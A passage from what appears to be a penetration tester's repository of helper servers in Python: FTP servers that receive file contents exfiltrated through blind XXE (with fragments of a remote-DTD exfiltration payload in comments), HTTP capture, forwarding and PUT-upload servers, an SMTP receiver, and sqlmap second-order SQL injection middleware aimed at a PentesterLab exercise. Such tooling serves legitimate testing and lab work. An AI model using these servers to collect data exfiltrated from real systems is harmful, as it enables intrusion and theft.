36 | with open(filename, 'w') as f: 37 | f.write(data) 38 | 39 | def recvall(self, timeout=''): 40 | #setup to use non-blocking sockets 41 | #if no data arrives it assumes transaction is done 42 | #recv() returns a string 43 | self.request.setblocking(0) 44 | total_data=[] 45 | data='' 46 | begin=time.time() 47 | if not timeout: 48 | timeout=1 49 | while 1: 50 | #if you got some data, then break after wait sec 51 | if total_data and time.time()-begin>timeout: 52 | break 53 | #if you got no data at all, wait a little longer 54 | elif time.time()-begin>timeout*2: 55 | break 56 | wait=0 57 | try: 58 | data=self.request.recv(64) 59 | if data: 60 | total_data.append(data) 61 | begin=time.time() 62 | data='';wait=0 63 | else: 64 | time.sleep(0.001) 65 | except: 66 | pass 67 | #When a recv returns 0 bytes, other side has closed 68 | result=''.join(total_data) 69 | return result 70 | 71 | def handle(self): 72 | """Handle incoming data.""" 73 | self.debug('Connection from %s:%d.' % self.client_address) 74 | self.respond(220, 'Welcome') 75 | self.recvdata = '' 76 | 77 | while True: 78 | cmd, args, data = self.process_request() 79 | arg = (args and args[0] or '') 80 | if cmd == 'USER': 81 | self.debug(data.strip()) 82 | self.respond(331, 'Please specify the password.') 83 | # signals an attempt to change to passive mode, but by this time we probably already have our data and want to terminate 84 | elif cmd == 'EPSV': 85 | self.debug(data.strip()) 86 | self.respond(522, 'Not supported') 87 | self.debug('R: 522, Not supported') 88 | elif cmd == 'CWD': 89 | #self.debug(data.strip()) 90 | if self.server.verbose or self.debug: 91 | stdout.write('/' + arg) 92 | self.recvdata += '/' + arg 93 | self.respond(230, 'Proceed') 94 | elif cmd == 'RETR': 95 | self.debug(data.strip()) 96 | if self.server.verbose or self.debug: 97 | stdout.write('/' + arg) 98 | self.recvdata += '/' + arg 99 | self.respond(530, 'Go away') 100 | break 101 | else: 102 | self.debug(data.strip()) 103 | self.respond(230, 'Proceed') 104 | self.debug('R: 230, Proceed') 105 | 106 | self.request.close() 107 | if self.server.verbose or self.debug: 108 | print "\n" 109 | if self.server.save_to_file: 110 | self.save_to_file(self.recvdata[1:]) #remove leading added / 111 | self.debug('Connection with %s:%d closed.' % self.client_address) 112 | 113 | 114 | class FTPServer(ThreadingTCPServer): 115 | 116 | def __init__(self, host='', port=21, debug=False, save_to_file=False, 117 | verbose=True): 118 | ThreadingTCPServer.__init__(self, (host, port), FTPHandler) 119 | self.debug = debug 120 | self.verbose = verbose 121 | self.save_to_file = save_to_file 122 | 123 | def server_close(self): 124 | ThreadingTCPServer.server_close(self) 125 | 126 | 127 | 128 | if __name__ == '__main__': 129 | parser = OptionParser(usage='%prog [options] ') 130 | parser.add_option('-d', '--debug', dest='debug', action='store_true', 131 | help='show debugging messages') 132 | parser.add_option('-s', '--save', dest='save_to_file', action='store_true', 133 | help='write collected data to generated logfiles') 134 | opts, args = parser.parse_args() 135 | 136 | # Parse arguments. 137 | if len(args) != 1: 138 | parser.print_help() 139 | parser.exit() 140 | try: 141 | port = int(args[0]) 142 | except ValueError: 143 | parser.print_help() 144 | parser.exit() 145 | 146 | # Serve. 147 | server = FTPServer(port=port, **opts.__dict__) 148 | try: 149 | server.serve_forever() 150 | except KeyboardInterrupt: 151 | print 'Ctrl-C pressed, exiting...' 152 | server.server_close() 153 | 154 | -------------------------------------------------------------------------------- /helper_servers/ftp-xxe3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import time 3 | from optparse import OptionParser 4 | from sys import stdout 5 | from socketserver import BaseRequestHandler, ThreadingTCPServer 6 | import asyncio 7 | import threading 8 | 9 | # ftp-xxe XXE data retrieval server updated for Python 3 and providing basic PASV support for clients that request it and die without it 10 | 11 | # Blind Example: 12 | # XXE injection 13 | # %xxe;]> 14 | 15 | # remote DTD 16 | # 17 | #"> 18 | #%eval; 19 | #%exfiltrate; 20 | 21 | 22 | 23 | # used for PASV server 24 | def tcpWorker(host, port): 25 | 26 | # this is unlikely to ever receive anything, it just needs to be ready to accept a TCP connection 27 | async def handle_client(reader, writer): 28 | data = await reader.read(100) 29 | message = data.decode() 30 | addr = writer.get_extra_info('peername') 31 | print(f"Received {message!r} from {addr!r}") 32 | writer.write(data) 33 | await writer.drain() 34 | writer.close() 35 | 36 | loop = asyncio.new_event_loop() 37 | asyncio.set_event_loop(loop) 38 | 39 | server = asyncio.start_server(handle_client, host, port) 40 | loop.run_until_complete(server) 41 | loop.run_forever() 42 | 43 | 44 | 45 | class FTPHandler(BaseRequestHandler): 46 | """Handler for FTP sessions.""" 47 | 48 | def debug(self, message): 49 | """Show log message.""" 50 | if self.server.debug: 51 | print('***', message) 52 | 53 | def respond(self, code, explanation): 54 | """Send a response to the client.""" 55 | self.request.send(b'%d %s\r\n' % (code, explanation)) 56 | 57 | def process_request(self): 58 | """Parse input into a command and an argument.""" 59 | 60 | data = self.recvall() 61 | parts = data.strip().split(b' ',1) 62 | return parts.pop(0), parts, data.strip() 63 | 64 | 65 | def save_to_file(self, data): 66 | client = '%s:%d' % self.client_address 67 | filename = client + '-' + str(int(time.time())) 68 | with open(filename, 'w') as f: 69 | f.write(data) 70 | 71 | def recvall(self, timeout=''): 72 | #setup to use non-blocking sockets 73 | #if no data arrives it assumes transaction is done 74 | #recv() returns bytes 75 | self.request.setblocking(0) 76 | total_data=[] 77 | data='' 78 | begin=time.time() 79 | if not timeout: 80 | timeout=1 81 | while 1: 82 | #if you got some data, then break after wait sec 83 | if total_data and time.time()-begin>timeout: 84 | break 85 | #if you got no data at all, wait a little longer 86 | elif time.time()-begin>timeout*2: 87 | break 88 | wait=0 89 | try: 90 | data=self.request.recv(64) 91 | if data: 92 | total_data.append(data) 93 | begin=time.time() 94 | data='';wait=0 95 | else: 96 | time.sleep(0.001) 97 | except: 98 | pass 99 | #When a recv returns 0 bytes, other side has closed 100 | result=b''.join(total_data) 101 | return result 102 | 103 | def handle(self): 104 | """Handle incoming data.""" 105 | self.debug('Connection from %s:%d.' % self.client_address) 106 | self.respond(220, b'Welcome') 107 | self.recvdata = '' 108 | 109 | while True: 110 | cmd, args, data = self.process_request() 111 | arg = (args and args[0] or '') 112 | if cmd == b'USER': 113 | self.debug(data.strip()) 114 | self.respond(331, b'Please specify the password.') 115 | #self.debug('') 116 | elif cmd == b'PASS': 117 | self.debug(data.strip()) 118 | self.respond(230, b'Login successful') 119 | elif cmd == b'PWD': 120 | self.debug(data.strip()) 121 | self.respond(257, b'"/" is the current directory.') 122 | elif cmd == b'TYPE': 123 | self.debug(data.strip()) 124 | self.respond(200, b'Type set to: Binary') 125 | elif cmd == b'OPTS': 126 | self.debug(data.strip()) 127 | self.respond(501, b'Invalid argument.') 128 | elif cmd == b'PASV': 129 | 130 | # super hacky PASV standin - for some servers there just needs to be something to connect to for the RETR with file content to happen after PASV 131 | # saying not supported might be better? 132 | if not self.server.pasv_running: 133 | bgsk = threading.Thread(target=tcpWorker, args=(self.server.server_address[0], self.server.pasv_port), daemon=True).start() 134 | self.server.pasv_running = True 135 | 136 | self.debug(data.strip()) 137 | # PASV port is number 5 * 256 + number 6(!) 138 | resp = 'Entering passive mode ({},{},{}).'.format(','.join(self.server.server_address[0].split('.')), round(self.server.pasv_port/256), self.server.pasv_port%256) 139 | self.respond(277, bytes(resp, 'utf8')) 140 | self.debug(resp) 141 | if self.server.server_address[0] == '0.0.0.0': 142 | self.debug('DEBUG: If things fail here try setting the i option to the IP address the client is connecting to') 143 | elif cmd == b'EPSV': 144 | self.debug(data.strip()) 145 | self.respond(522, b'Not supported') 146 | self.debug('R: 522, Not supported') 147 | elif cmd == b'CWD': 148 | self.debug(data.strip()) 149 | self.recvdata += '/' + arg 150 | self.respond(230, b'Proceed') 151 | elif cmd == b'RETR': 152 | self.debug(data.strip()) 153 | if self.server.verbose or self.debug: 154 | stdout.write('File content:\n\n') 155 | stdout.write(arg.decode()) 156 | self.recvdata += str(arg) 157 | self.respond(530, b'Go away') 158 | break 159 | else: 160 | self.debug(data.strip()) 161 | self.respond(230, b'Proceed') 162 | self.debug('R: 230, Proceed') 163 | 164 | self.request.close() 165 | if self.server.verbose or self.debug: 166 | print("\n") 167 | if self.server.save_to_file: 168 | self.save_to_file(self.recvdata) 169 | self.debug('Connection with %s:%d closed.' % self.client_address) 170 | 171 | 172 | class FTPServer(ThreadingTCPServer): 173 | 174 | def __init__(self, host='', port=21, debug=False, save_to_file=False, verbose=True, pasv_port=63071): 175 | ThreadingTCPServer.__init__(self, (host, port), FTPHandler) 176 | self.debug = debug 177 | self.verbose = verbose 178 | self.save_to_file = save_to_file 179 | self.pasv_port = pasv_port 180 | self.pasv_running = False 181 | 182 | 183 | def server_close(self): 184 | ThreadingTCPServer.server_close(self) 185 | 186 | 187 | 188 | if __name__ == '__main__': 189 | parser = OptionParser(usage='%prog [options] ') 190 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 191 | parser.add_option('-s', '--save', dest='save_to_file', action='store_true', help='write collected data to generated logfiles') 192 | parser.add_option('-i', '--ip', dest='host', default='', help='local ip address to bind to, might be required if remote client requests PASV mode') 193 | parser.add_option('-p', '--pasv_port', dest='pasv_port', default=63071, type=int, help='Local server port to use for PASV, if required') 194 | opts, args = parser.parse_args() 195 | 196 | # Parse arguments. 197 | if len(args) != 1: 198 | parser.print_help() 199 | parser.exit() 200 | try: 201 | port = int(args[0]) 202 | except ValueError: 203 | parser.print_help() 204 | parser.exit() 205 | 206 | 207 | 208 | server = FTPServer(port=port, **opts.__dict__) 209 | try: 210 | server.serve_forever() 211 | except KeyboardInterrupt: 212 | print('Ctrl-C pressed, exiting...') 213 | server.server_close() 214 | -------------------------------------------------------------------------------- /helper_servers/http_capture_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | import os 5 | import argparse 6 | from http.server import SimpleHTTPRequestHandler 7 | import socketserver 8 | import logging 9 | import ssl 10 | 11 | 12 | class MyParser(argparse.ArgumentParser): 13 | def error(self, message): 14 | sys.stderr.write('error: %s\n' % message) 15 | self.print_help() 16 | sys.exit(2) 17 | 18 | 19 | class LoggingHTTPRequestHandler(SimpleHTTPRequestHandler): 20 | 21 | def __init__(self, *args, **kwargs): 22 | super().__init__(*args, **kwargs) 23 | 24 | def _set_response(self): 25 | self.send_response(200) 26 | self.send_header('Content-type', 'text/html') 27 | self.end_headers() 28 | 29 | def do_GET(self): 30 | logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) 31 | super().do_GET() 32 | 33 | def do_OPTIONS(self): 34 | logging.info("OPTIONS request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) 35 | super().do_GET() 36 | 37 | 38 | def do_POST(self): 39 | content_length = int(self.headers['Content-Length']) 40 | post_data = self.rfile.read(content_length) 41 | logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", 42 | str(self.path), str(self.headers), post_data.decode('utf-8')) 43 | 44 | self._set_response() 45 | self.wfile.write("POST request for {}".format(self.path).encode('utf-8')) 46 | 47 | def end_headers(self): 48 | if 'origin' in self.headers and (not getattr(self, 'disable_cors_headers', False)): 49 | a_headers = ['content-type', 'x-requested-with'] 50 | a_headers += [a.rstrip().lstrip() for a in self.headers.get('Access-Control-Request-Headers', '').split(',') if a] 51 | a_methods = ['POST', 'GET', 'OPTIONS', 'DELETE'] 52 | a_methods += [a.rstrip().lstrip() for a in self.headers.get('Access-Control-Request-Methods', '').split(',') if a] 53 | origin = self.headers.get('origin') 54 | response_headers = { 55 | 'Access-Control-Allow-Origin' : origin if origin != 'null' else '*', 56 | 'Access-Control-Allow-Methods': ', '.join(set([a for a in a_methods if a])), 57 | 'Access-Control-Allow-Headers' : ', '.join(set([a for a in a_headers if a])), 58 | 'Access-Control-Allow-Credentials': 'true' 59 | } 60 | for key in response_headers: 61 | self.send_header(key, response_headers[key]) 62 | super().end_headers() 63 | 64 | 65 | def create_custom_handler(directory: str, disable_cors: bool): 66 | 67 | class PathedLoggingHTTPRequestHandler(LoggingHTTPRequestHandler): 68 | def __init__(self, *args, **kwargs): 69 | self.disable_cors_headers = disable_cors 70 | super().__init__(*args, directory=directory, **kwargs) 71 | 72 | return PathedLoggingHTTPRequestHandler 73 | 74 | 75 | 76 | def run(port: int, address: str='', wrap_ssl: bool=False, ssl_keyfile: str=None, ssl_certfile: str=None, directory: str=None, disable_cors=False): 77 | logging.basicConfig(level=logging.INFO) 78 | server_address = (address, port) 79 | directory = directory if directory else os.getcwd() 80 | #httpd = HTTPServer(server_address, create_custom_handler(directory, disable_cors)) 81 | httpd = socketserver.ForkingTCPServer(server_address, create_custom_handler(directory, disable_cors)) 82 | 83 | if wrap_ssl: 84 | httpd.socket = ssl.wrap_socket (httpd.socket, 85 | keyfile=ssl_keyfile, 86 | certfile=ssl_certfile, server_side=True) 87 | 88 | logging.info('Starting httpd on port {}...\n'.format(str(port))) 89 | try: 90 | httpd.serve_forever() 91 | except KeyboardInterrupt: 92 | pass 93 | httpd.server_close() 94 | logging.info('Stopping httpd...\n') 95 | 96 | 97 | if __name__ == '__main__': 98 | 99 | parser = MyParser() 100 | parser.add_argument('-p', '--port', type=int, required=True, help='Port to serve on') 101 | parser.add_argument('-s', '--ssl', action='store_true', default=False, help='Enable ssl. If set you also need to provide a key and cert file . Default: disabled.') 102 | parser.add_argument('-k', '--key', type=str, default=None, help='SSL private key file in pem format') 103 | parser.add_argument('-c', '--cert', type=str, default=None, help='SSL certificate file in pem format') 104 | parser.add_argument('-a', '--address', type=str, default='', help='Address to bind the server to, defaults to all ') 105 | parser.add_argument('-d', '--directory', type=str, default=None, help='Directory to serve files from. pwd is used if not set.') 106 | parser.add_argument('-o', '--disable_cors', action='store_true', default=False, help='Disable the addition of permissive CORS headers in responses to requests with Origin header') 107 | args = parser.parse_args() 108 | 109 | if args.ssl: 110 | if not args.key and args.cert: 111 | print('If the ssl option is enabled you must also provide both a certificate (-c) and key (-k) file') 112 | parser.print_help() 113 | sys.exit(2) 114 | 115 | run(port=args.port, address=args.address, wrap_ssl=args.ssl, ssl_keyfile=args.key, ssl_certfile=args.cert, directory=args.directory, disable_cors=args.disable_cors) 116 | 117 | 118 | -------------------------------------------------------------------------------- /helper_servers/http_forwarder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | import logging 7 | from optparse import OptionParser 8 | 9 | 10 | class ResultsProvider(object): 11 | '''Base class used to fetch data from server for forwarding''' 12 | 13 | import requests 14 | import socket 15 | import time 16 | 17 | def __init__(self, **kwargs): 18 | '''Constructor with sensible requests defaults''' 19 | self.session = self.requests.Session() 20 | self.wait = kwargs.get('wait', 2.0) 21 | self.session.verify = kwargs.get('verify', False) 22 | self.session.timeout = kwargs.get('timeout', 5) 23 | self.session.stream = kwargs.get('stream', False) 24 | self.session.proxies = kwargs.get('proxies', {}) 25 | self.session.headers = kwargs.get('headers', {}) 26 | self.session.allow_redirects = kwargs.get('allow_redirects', True) 27 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {})) 28 | self.url = kwargs.get('url', None) 29 | 30 | 31 | 32 | def doRequest(self, verb, url, **kwargs): 33 | '''Makes web request with timeoout support using requests session''' 34 | while 1: 35 | try: 36 | body = kwargs.pop('body') if kwargs.has_key('body') else None 37 | rargs = {} 38 | for a in ['data', 'json', 'params', 'headers']: 39 | if kwargs.has_key(a): 40 | rargs[a] = kwargs.pop(a) 41 | req = self.requests.Request(verb, url, **rargs) # data, headers, params, json 42 | prepped = req.prepare() 43 | if body: 44 | prepped.body = body 45 | response = self.session.send(prepped, **kwargs) # other params here 46 | break 47 | except (self.socket.error, self.requests.exceptions.RequestException): 48 | logging.exception('Retrying request in %.2f seconds...', self.wait) 49 | self.time.sleep(self.wait) 50 | continue 51 | return response 52 | 53 | 54 | 55 | 56 | def nextResult(self): 57 | '''Redefine me to make the request and return the response.text''' 58 | #return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text 59 | raise NotImplementedError 60 | 61 | 62 | 63 | 64 | 65 | class ResultsProviderImpl(ResultsProvider): 66 | '''Implementation for forwarding arbitrary requests to another server''' 67 | 68 | def __init__(self, **kwargs): 69 | super(ResultsProviderImpl, self).__init__(**kwargs) 70 | self.hostname=kwargs.get('hostname') 71 | self.protocol=kwargs.get('protocol', 'http') 72 | self.port=kwargs.get('port') 73 | 74 | 75 | def nextResult(self, verb, path, **kwargs): 76 | r = self.doRequest(verb, '%s://%s:%s%s' %(self.protocol, self.hostname, self.port, path), **kwargs) 77 | return r 78 | 79 | 80 | 81 | 82 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 83 | '''Simple Threaded TCP server''' 84 | pass 85 | 86 | 87 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 88 | '''Simple http server request handler''' 89 | import datetime 90 | counter=0 91 | 92 | skip_headers = ['content-length', 'transfer-encoding', 'content-encoding', 'connection'] 93 | 94 | def print_debug(self, title, data): 95 | sep = '=' * 40 + '\n' 96 | dt = self.datetime.datetime.now() 97 | dts = dt.strftime('%d/%m/%Y %H:%M:%S') 98 | self.counter+=1 99 | print sep + title + ' - ' + str(self.counter) + ' - ' + dts + '\n' + sep + data + '\n' 100 | 101 | 102 | def send_response(self, code, message=None): 103 | '''Redefine from original to get rid of extra headers''' 104 | self.log_request(code) 105 | if message is None: 106 | if code in self.responses: 107 | message = self.responses[code][0] 108 | else: 109 | message = '' 110 | if self.request_version != 'HTTP/0.9': 111 | self.wfile.write("%s %d %s\r\n" % 112 | (self.protocol_version, code, message)) 113 | # print (self.protocol_version, code, message) 114 | #self.send_header('Server', self.version_string()) 115 | #self.send_header('Date', self.date_time_string()) 116 | 117 | 118 | 119 | def do(self, verb, data=None): 120 | args = {'headers' : self.headers.dict} 121 | if data: 122 | args['data'] = data 123 | response = self.server.resultsProvider.nextResult(verb, self.path, **args) 124 | if self.server.debug: 125 | self.print_debug('HTTP Request Received', self.raw_requestline + str(self.headers) + '\r\n' + (data if data else '')) 126 | 127 | self.send_response(response.status_code, response.reason) 128 | for header in response.headers.iteritems(): 129 | if header[0].lower() not in self.skip_headers: 130 | #self.print_debug('Header Sent', ' :'.join([header[0], header[1]])) 131 | self.send_header(header[0], header[1]) 132 | self.send_header('Content-Length', int(len(response.content))) 133 | self.send_header('Connection', 'close') 134 | self.wfile.write('\r\n') 135 | self.wfile.write(response.content) 136 | if self.server.debug: 137 | http_version = '.'.join([a for a in str(response.raw.version)]) 138 | version_line = 'HTTP/%s %s %s' %(http_version, response.status_code, response.reason) 139 | headers = '\r\n'.join([ '%s : %s' %(a[0],a[1]) for a in response.headers.items()]) 140 | self.print_debug('HTTP Response Received', '\r\n'.join([version_line, headers, '\r\n' + response.content])) 141 | #self.print_debug('Length of response', str(int(len(response.content)))) 142 | 143 | self.wfile.flush() 144 | self.wfile.close() 145 | 146 | 147 | def do_GET(self): 148 | self.do('GET') 149 | 150 | 151 | def do_HEAD(self): 152 | self.do('HEAD') 153 | 154 | 155 | def do_POST(self): 156 | data = self.rfile.read(int(self.headers['Content-Length'])) if \ 157 | self.headers.has_key('Content-Length') else '' 158 | self.do('POST', data=data) 159 | 160 | 161 | def match_url(input): 162 | return ((input.startswith('http://') or input.startswith('https://')) and \ 163 | input.endswith('/') and len(input.split('/')[2]) > 4 and len(input.split('/')) == 4) 164 | 165 | 166 | if __name__ == '__main__': 167 | parser = OptionParser(usage='%prog -u [url] [options]') 168 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 169 | parser.add_option('-u', '--url', dest='remoteurl', type='string', help='remote base url') 170 | parser.add_option('-p', '--port', dest='port', type='int', default=8000, help='local listen port') 171 | parser.add_option('-a', '--address', dest='address', type='string', default='0.0.0.0', help='local listen address') 172 | parser.add_option('-x', '--proxy', dest='proxy', type='string', help='optional proxy to use in format http://address:port/') 173 | opts, args = parser.parse_args() 174 | 175 | 176 | if opts.remoteurl == None: 177 | print 'Please provide a remote url using the -u --url option' 178 | sys.exit() 179 | elif not match_url(opts.remoteurl): 180 | print 'Please enter remote url in format protocol://host[:port]/' 181 | sys.exit() 182 | 183 | try: 184 | [protocol, _, host_port, _] = opts.remoteurl.split('/') 185 | protocol = protocol.rstrip(':') 186 | hostparts = host_port.split(':') 187 | hostname = hostparts[0] 188 | rport = int(hostparts[1]) if len(hostparts) > 1 else {'http' : 80, 'https' : 443}[protocol] 189 | except: 190 | print 'Please enter remote url in format protocol://host[:port]/' 191 | sys.exit() 192 | 193 | if opts.proxy: 194 | if not match_url(opts.proxy) and not opts.proxy.startswith('https'): 195 | print 'Please enter proxy in format http://host:port/' 196 | sys.exit() 197 | if opts.debug: 198 | print 'Using proxy ' + opts.proxy 199 | proxies = {protocol : opts.proxy} 200 | else: 201 | proxies = {} 202 | 203 | 204 | httpd = ThreadedTCPServer((opts.address, opts.port), ServerHandler) 205 | httpd.debug = opts.debug or False 206 | 207 | # add the custom resultsprovider implementation 208 | httpd.resultsProvider = ResultsProviderImpl(hostname=hostname, protocol=protocol, port=rport, proxies=proxies) 209 | 210 | 211 | print "Serving at: http://%s:%s/, forwarding requests to %s" % (opts.address, str(opts.port), opts.remoteurl) 212 | httpd.serve_forever() 213 | -------------------------------------------------------------------------------- /helper_servers/http_put_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from __future__ import print_function 3 | import sys 4 | import os 5 | import signal 6 | from threading import Thread 7 | if sys.version_info.major == 2: 8 | from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler 9 | else: 10 | from http.server import HTTPServer, BaseHTTPRequestHandler 11 | 12 | # to upload 13 | # curl -T 14 | 15 | class PUTHandler(BaseHTTPRequestHandler): 16 | def do_PUT(self): 17 | print("----- SOMETHING WAS PUT!! ------") 18 | print(self.headers) 19 | length = int(self.headers['Content-Length']) 20 | content = self.rfile.read(length) 21 | self.send_response(200) 22 | self.end_headers() 23 | open(os.getcwd() + self.path,'wb').write(content) 24 | 25 | def run_on(port): 26 | print("Starting a server on port %i" % port) 27 | server_address = ('0.0.0.0',port) 28 | httpd = HTTPServer(server_address, PUTHandler) 29 | httpd.serve_forever() 30 | 31 | if __name__ == "__main__": 32 | if len(sys.argv) < 2: 33 | print('Port number to listen on as parameter 1') 34 | sys.exit(1) 35 | ports = [int(arg) for arg in sys.argv[1:]] 36 | for port_number in ports: 37 | server = Thread(target=run_on, args=[port_number]) 38 | server.daemon = True # Do not make us wait for you to exit 39 | server.start() 40 | signal.pause() # Wait for interrupt signal, e.g. KeyboardInterrupt 41 | -------------------------------------------------------------------------------- /helper_servers/smtp_receiver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | '''SMTP server''' 3 | from __future__ import print_function 4 | from smtpd import SMTPServer 5 | from optparse import OptionParser 6 | import asyncore 7 | import os 8 | import sys 9 | import time 10 | import inspect 11 | 12 | 13 | # shut up about constants pylint! 14 | # pylint: disable-msg=C0103 15 | 16 | class CustomSMTPServer(SMTPServer): 17 | '''Custom SMTP receiver class that writes output to individual files on disk''' 18 | 19 | def __init__(self, localaddr, remoteaddr, outputdir, debug=False): 20 | '''Initialise''' 21 | self.outputdir = outputdir 22 | self.debug = debug 23 | if not (os.path.exists(outputdir) and os.path.isdir(outputdir)): 24 | raise ValueError('Provided output dir does not exist or is not a directory') 25 | SMTPServer.__init__(self, localaddr, remoteaddr) 26 | 27 | 28 | def get_messageid(self, data): 29 | '''Gets the sanitised message id from a message or a random hex string if missing''' 30 | allowed = '._-0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 31 | m_ids = [a for a in data.split('\n') if a.startswith('Message-ID: ')] 32 | m_id = m_ids[0].split(': ', 1)[1] if m_ids else os.urandom(20).encode('hex') 33 | m_id = m_id.replace('@', '_at_') 34 | return ''.join([a for a in m_id if a in allowed]) 35 | 36 | 37 | def process_message(self, peer, mailfrom, rcpttos, data): 38 | '''Process received messages''' 39 | 40 | # hacky method of getting HELO header 41 | frame = inspect.currentframe().f_back 42 | try: 43 | # pylint: disable-msg=W0212 44 | helo = str(frame.f_locals['self']._SMTPChannel__greeting) + ' ' 45 | except AttributeError: 46 | helo = '' 47 | 48 | 49 | headers = [] 50 | headers.append('Received: from ' + helo + ':'.join([str(a) for a in peer])) 51 | headers.append('Rcpt date: ' + time.strftime('%c %Z')) 52 | headers.append('Rcpt from: ' + mailfrom) 53 | headers.append('Rcpt to: ' + ', '.join([a for a in rcpttos])) 54 | if self.debug: 55 | for header in headers: 56 | print(header) 57 | print(data) 58 | message_id = self.get_messageid(data) 59 | time_stamp = time.strftime('%Y%m%d%H%M%S') 60 | out = os.path.join(self.outputdir, time_stamp + '_' + message_id) 61 | open(out, 'w').write('\n'.join([a for a in headers]) + '\n' + data) 62 | return 63 | 64 | 65 | if __name__ == '__main__': 66 | parser = OptionParser(usage='%prog [options] host port output_directory') 67 | parser.add_option('-d', '--debug', dest='debug', default=False, 68 | action='store_true', help='show debugging messages') 69 | opts, args = parser.parse_args() 70 | 71 | try: 72 | host = args[0] 73 | port = int(args[1]) 74 | output = args[2] 75 | except (ValueError, NameError, IndexError): 76 | print(parser.format_help()) 77 | sys.exit(1) 78 | 79 | try: 80 | smtp_server = CustomSMTPServer((host, port), None, output, debug=opts.debug) 81 | except ValueError: 82 | print('Provided output_directory does not exist') 83 | sys.exit(1) 84 | 85 | asyncore.loop() 86 | -------------------------------------------------------------------------------- /helper_servers/sqlmap_secondorder_helper_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import SimpleHTTPServer 3 | import SocketServer 4 | import sys 5 | import urllib 6 | import logging 7 | from optparse import OptionParser 8 | 9 | 10 | # Helper example middleware server to enable sqlmap to use its second-order exploitation option with changing urls 11 | # modify as needed for your purposes 12 | 13 | # To Use: 14 | # Create your own implementation of the ResultsProvider class which returns the desired page with the nextResult method 15 | # An example of how this can be done for a URL with incrementing value is shown in ResultsProviderImpl 16 | 17 | # create an instance of the ThreadedTCPServer, and pass the resultsProvider and any desired parameters in like so 18 | #httpd = ThreadedTCPServer(("", port), ServerHandler) 19 | #httpd.resultsProvider = ResultsProviderImpl(url='http://server/base/path', counter=23) 20 | #httpd.serve_forever() 21 | 22 | # Then run sqlmap with the second order option pointing to this server, e.g. 23 | # --second-order=http://127.0.0.1:8000/ 24 | 25 | # When sqlmap queries this server for the second order result, this server will fetch the appropriate result 26 | # from the remote server and then supply it back to sqlmap, also allowing you to modify the response if desired 27 | 28 | class ResultsProvider(object): 29 | '''Base class used to fetch data from server for second order injection using sqlmap''' 30 | 31 | import requests 32 | import socket 33 | import time 34 | 35 | def __init__(self, **kwargs): 36 | '''Constructor with sensible requests defaults''' 37 | self.session = self.requests.Session() 38 | self.wait = kwargs.get('wait', 2.0) 39 | self.session.verify = kwargs.get('verify', False) 40 | self.session.timeout = kwargs.get('timeout', 5) 41 | self.session.stream = kwargs.get('stream', False) 42 | self.session.proxies = kwargs.get('proxies', {}) 43 | self.session.headers = kwargs.get('headers', {}) 44 | self.session.allow_redirects = kwargs.get('allow_redirects', True) 45 | self.session.cookies = self.requests.utils.cookiejar_from_dict(kwargs.get('cookies', {})) 46 | self.url = kwargs.get('url', None) 47 | 48 | 49 | 50 | def doRequest(self, url, params=None, **kwargs): 51 | '''Makes web request with timeoout support using requests session''' 52 | while 1: 53 | try: 54 | response = self.session.get(url, params=params, **kwargs) 55 | break 56 | except (self.socket.error, self.requests.exceptions.RequestException): 57 | logging.exception('Retrying request in %.2f seconds...', self.wait) 58 | self.time.sleep(self.wait) 59 | continue 60 | return response 61 | 62 | 63 | 64 | def nextResult(self): 65 | '''Redefine me to make the request and return the response.text''' 66 | #return self.doRequest(url='http://site/whatever/' + str(calculated_value)).text 67 | raise NotImplementedError 68 | 69 | 70 | 71 | 72 | 73 | class ResultsProviderImpl(ResultsProvider): 74 | '''Example implementation to exploit 2nd order injection in Pentesterlabs Web II SQL Injection''' 75 | 76 | def __init__(self, **kwargs): 77 | super(ResultsProviderImpl, self).__init__(**kwargs) 78 | self.counter=kwargs.get('counter', 1) 79 | 80 | def nextResult(self): 81 | r = self.doRequest(url=self.url + str(self.counter)) 82 | self.counter+=1 83 | return r.text 84 | 85 | 86 | 87 | 88 | 89 | class ThreadedTCPServer(SocketServer.ThreadingTCPServer): 90 | '''Simple Threaded TCP server''' 91 | pass 92 | 93 | 94 | class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 95 | '''Simple http server request handler''' 96 | 97 | def do_GET(self): 98 | if self.server.debug: 99 | print '=' * 40 + '\n' 100 | print self.headers 101 | print '=' * 40 + '\n' 102 | 103 | self.send_response(200) 104 | self.wfile.write('\r\n') 105 | result = self.server.resultsProvider.nextResult() 106 | self.wfile.write(result) 107 | if self.server.debug: 108 | print '=' * 40 + '\n' 109 | print result 110 | print '=' * 40 + '\n' 111 | 112 | self.wfile.write('\r\n') 113 | self.wfile.flush() 114 | self.wfile.close() 115 | 116 | 117 | 118 | 119 | 120 | if __name__ == '__main__': 121 | parser = OptionParser(usage='%prog [options] ') 122 | parser.add_option('-d', '--debug', dest='debug', action='store_true', help='show debugging messages') 123 | opts, args = parser.parse_args() 124 | 125 | 126 | if len(args) == 1: 127 | try: 128 | port = int(args[0]) 129 | except ValueError: 130 | parser.print_help() 131 | parser.exit() 132 | else: 133 | port = 8000 134 | 135 | 136 | # parameters for example 137 | # base url where second order injection occurs 138 | baseUrl = 'http://192.168.33.101/sqlinjection/example8/users/' 139 | # starting point to count upwards from in injected results 140 | baseNo = 738 141 | 142 | 143 | httpd = ThreadedTCPServer(("", port), ServerHandler) 144 | httpd.debug = opts.debug or False 145 | 146 | # add the custom 